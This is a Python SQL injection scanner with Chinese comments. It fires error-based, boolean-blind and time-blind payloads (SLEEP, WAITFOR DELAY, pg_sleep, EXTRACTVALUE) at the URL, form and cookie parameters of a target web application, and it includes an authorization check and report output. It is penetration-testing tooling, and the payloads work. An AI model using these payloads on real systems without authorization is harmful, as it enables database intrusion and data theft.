#!/usr/bin/env python3 """ SQL Injection Scanner 自动检测SQL注入漏洞点 支持: - GET/POST 参数注入 - Cookie 注入 - Header 注入 - 时间盲注检测 - 布尔盲注检测 - 报错注入检测 Usage: python3 sqli-scanner.py -u "http://target.com/page?id=1" python3 sqli-scanner.py -u "http://target.com" --data "id=1&name=test" python3 sqli-scanner.py -u "http://target.com" --cookie "id=1" 授权边界: - 仅用于自有资产、测试环境或已明确授权的目标 - 允许公网验证,但必须确认资产归属或授权关系 - 不面向无授权第三方网站或泛互联网扫描 """ import argparse import requests import re import time import urllib.parse from concurrent.futures import ThreadPoolExecutor, as_completed from typing import List, Dict, Tuple, Optional import sys from pathlib import Path SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts" if str(SCRIPTS_DIR) not in sys.path: sys.path.insert(0, str(SCRIPTS_DIR)) from tool_contract import ( # noqa: E402 add_common_args, emit_report, ensure_authorized, make_report, parse_cookie_string, parse_headers, write_evidence, ) class Colors: RED = "\033[91m" GREEN = "\033[92m" YELLOW = "\033[93m" BLUE = "\033[94m" END = "\033[0m" BOLD = "\033[1m" class SQLiScanner: def __init__(self, timeout: int = 10, threads: int = 5): self.timeout = timeout self.threads = threads self.session = requests.Session() self.session.headers.update( { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } ) self.error_patterns = [ r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"MySqlException", r"PostgreSQL.*ERROR", r"Warning.*pg_.*", r"Invalid query: pg_", r"ORA-\d{5}", r"Oracle.*Driver", r"Warning.*oci_.*", r"Microsoft SQL Server", r"ODBC SQL Server Driver", r"SQLite.*error", r"sqlite3.OperationalError", r"Syntax error.*SQLite", r"Warning.*sqlite_", r"DB2 SQL error", r"DB2 SQLSTATE", r"Dynamic SQL Error", r"Warning.*ibase_", r"PLS-\d{5}", r"ORA-\d{5}", r"Error.*SQL.*", r"Exception.*SQL", r"SQLSTATE\[\d+\]", r"mysql_fetch", r"mysql_num_rows", r"pg_query", r"mysql_query", ] self.time_payloads = [ ("' AND SLEEP(5)-- -", "MySQL"), ("' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -", "MySQL"), ("'; WAITFOR DELAY '0:0:5'-- -", "MSSQL"), ("' AND 1=1; WAITFOR DELAY '0:0:5'-- -", "MSSQL"), ("' AND pg_sleep(5)-- -", "PostgreSQL"), ("' OR (SELECT pg_sleep(5))-- -", "PostgreSQL"), ("' AND (SELECT dbms_pipe.receive_message('a',5) FROM dual)-- -", "Oracle"), ("'||dbms_pipe.receive_message(chr(99),5)-- -", "Oracle"), ] self.bool_payloads = [ ("' AND 1=1-- -", "' AND 1=2-- -", "Boolean-based"), ("' OR '1'='1", "' OR '1'='2", "Boolean-based"), ("1 AND 1=1", "1 AND 1=2", "Boolean-based (numeric)"), ("1 OR 1=1", "1 OR 1=2", "Boolean-based (numeric)"), ] self.error_payloads = [ ("'", "Single quote"), ('"', "Double quote"), ("\\", "Backslash"), ("')", "Single quote parenthesis"), ('")', "Double quote parenthesis"), ("' OR 1=1-- -", "OR injection"), ( "' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))-- -", "MSSQL error", ), ( "' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))-- -", "MySQL error", ), ("' AND 1=CAST((SELECT version()) AS INT)-- -", "PostgreSQL error"), ] def print_result(self, level: str, msg: str): colors = { "INFO": Colors.BLUE, "SUCCESS": Colors.GREEN, "WARNING": Colors.YELLOW, "ERROR": Colors.RED, "VULN": Colors.RED + Colors.BOLD, } print(f"{colors.get(level, '')}[{level}]{Colors.END} {msg}") def test_error_based( self, url: str, param: str, method: str = "GET", data: Dict = None, cookies: Dict = None, ) -> Tuple[bool, Optional[str]]: """测试报错注入""" original_resp = self._request(url, method, data, cookies) if not original_resp: return False, None original_len = len(original_resp.text) for payload, desc in self.error_payloads: test_data = data.copy() if data else {} test_data[param] = payload resp = self._request(url, method, test_data, cookies) if not resp: continue for pattern in self.error_patterns: if re.search(pattern, resp.text, re.IGNORECASE): return ( True, f"[报错注入] {param} - Payload: {payload} - 类型: {desc} - 匹配: {pattern}", ) if abs(len(resp.text) - original_len) > 500: return ( True, f"[报错注入] {param} - Payload: {payload} - 响应长度差异: {abs(len(resp.text) - original_len)}", ) return False, None def test_time_based( self, url: str, param: str, method: str = "GET", data: Dict = None, cookies: Dict = None, ) -> Tuple[bool, Optional[str]]: """测试时间盲注""" for payload, db_type in self.time_payloads: test_data = data.copy() if data else {} test_data[param] = payload start_time = time.time() resp = self._request(url, method, test_data, cookies, timeout=15) elapsed = time.time() - start_time if elapsed >= 4.5: return ( True, f"[时间盲注] {param} - Payload: {payload} - 数据库: {db_type} - 延迟: {elapsed:.2f}s", ) return False, None def test_bool_based( self, url: str, param: str, method: str = "GET", data: Dict = None, cookies: Dict = None, ) -> Tuple[bool, Optional[str]]: """测试布尔盲注""" for true_payload, false_payload, desc in self.bool_payloads: test_data_true = data.copy() if data else {} test_data_true[param] = true_payload test_data_false = data.copy() if data else {} test_data_false[param] = false_payload resp_true = self._request(url, method, test_data_true, cookies) resp_false = self._request(url, method, test_data_false, cookies) if not resp_true or not resp_false: continue diff = abs(len(resp_true.text) - len(resp_false.text)) if diff > 100: return ( True, f"[布尔盲注] {param} - True: {true_payload} - False: {false_payload} - 长度差: {diff}", ) true_text = resp_true.text.lower() false_text = resp_false.text.lower() if ( "success" in true_text or "welcome" in true_text or "admin" in true_text ) and ( "error" in false_text or "fail" in false_text or "wrong" in false_text ): return True, f"[布尔盲注] {param} - 关键词差异检测到 - {desc}" return False, None def _request( self, url: str, method: str, data: Dict = None, cookies: Dict = None, timeout: int = None, ) -> Optional[requests.Response]: """发送HTTP请求""" try: if method.upper() == "GET": params = urllib.parse.urlencode(data) if data else "" full_url = f"{url}?{params}" if params else url return self.session.get( full_url, cookies=cookies, timeout=timeout or self.timeout, verify=False, ) else: return self.session.post( url, data=data, cookies=cookies, timeout=timeout or self.timeout, verify=False, ) except requests.exceptions.RequestException as e: return None def scan_url( self, url: str, method: str = "GET", data: Dict = None, cookies: Dict = None, params: List[str] = None, ) -> List[str]: """扫描URL""" results = [] if not params: if method == "GET": parsed = urllib.parse.urlparse(url) params = list(urllib.parse.parse_qs(parsed.query).keys()) else: params = list(data.keys()) if data else [] if not params: self.print_result("WARNING", f"未找到可测试的参数") return results self.print_result("INFO", f"开始扫描 {len(params)} 个参数: {', '.join(params)}") for param in params: self.print_result("INFO", f"测试参数: {param}") vuln, msg = self.test_error_based(url, param, method, data, cookies) if vuln: results.append(msg) self.print_result("VULN", msg) continue vuln, msg = self.test_bool_based(url, param, method, data, cookies) if vuln: results.append(msg) self.print_result("VULN", msg) continue vuln, msg = self.test_time_based(url, param, method, data, cookies) if vuln: results.append(msg) self.print_result("VULN", msg) return results def main(): parser = argparse.ArgumentParser(description="SQL Injection Scanner") parser.add_argument("-u", "--url", required=True, help="目标URL") parser.add_argument( "-m", "--method", default="GET", choices=["GET", "POST"], help="HTTP方法" ) parser.add_argument("-d", "--data", help="POST数据 (格式: id=1&name=test)") parser.add_argument("-c", "--cookie", help="Cookie") parser.add_argument("-p", "--params", help="指定参数 (逗号分隔)") parser.add_argument("-t", "--threads", type=int, default=5, help="线程数") parser.add_argument("--timeout", type=int, default=10, help="超时时间") add_common_args(parser) args = parser.parse_args() ensure_authorized(args, parser) requests.packages.urllib3.disable_warnings() scanner = SQLiScanner(timeout=args.timeout, threads=args.threads) scanner.session.headers.update(parse_headers(args.header)) if args.proxy: scanner.session.proxies.update({"http": args.proxy, "https": args.proxy}) if args.format != "text": scanner.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment] data = {} if args.data: for pair in args.data.split("&"): if "=" in pair: k, v = pair.split("=", 1) data[k] = v cookies = parse_cookie_string(args.cookie) params = args.params.split(",") if args.params else None scanner.print_result("INFO", f"目标: {args.url}") scanner.print_result("INFO", f"方法: {args.method}") results = scanner.scan_url(args.url, args.method, data, cookies, params) evidence_refs = [] ref = write_evidence(args, "sqli-results.json", results) if ref: evidence_refs.append(ref) status = "verified" if results else "needs-review" severity = "high" if results else "info" report = make_report( tool="sqli-scanner", mode="non-destructive-sqli-scan", target=args.url, status=status, severity=severity, payload_or_probe={"hits": results, "params": params or sorted(data.keys())}, request_summary={ "method": args.method, "params": params or [], "threads": args.threads, "header_names": sorted(parse_headers(args.header).keys()), }, evidence_refs=evidence_refs, destructive_risk="medium", args=args, ) text_lines = [ "=" * 60, "SQL Injection Scanner", "=" * 60, f"Target: {args.url}", f"Method: {args.method}", f"Hits: {len(results)}", f"Status: {status}", ] emit_report(args, report, text_lines) if __name__ == "__main__": main()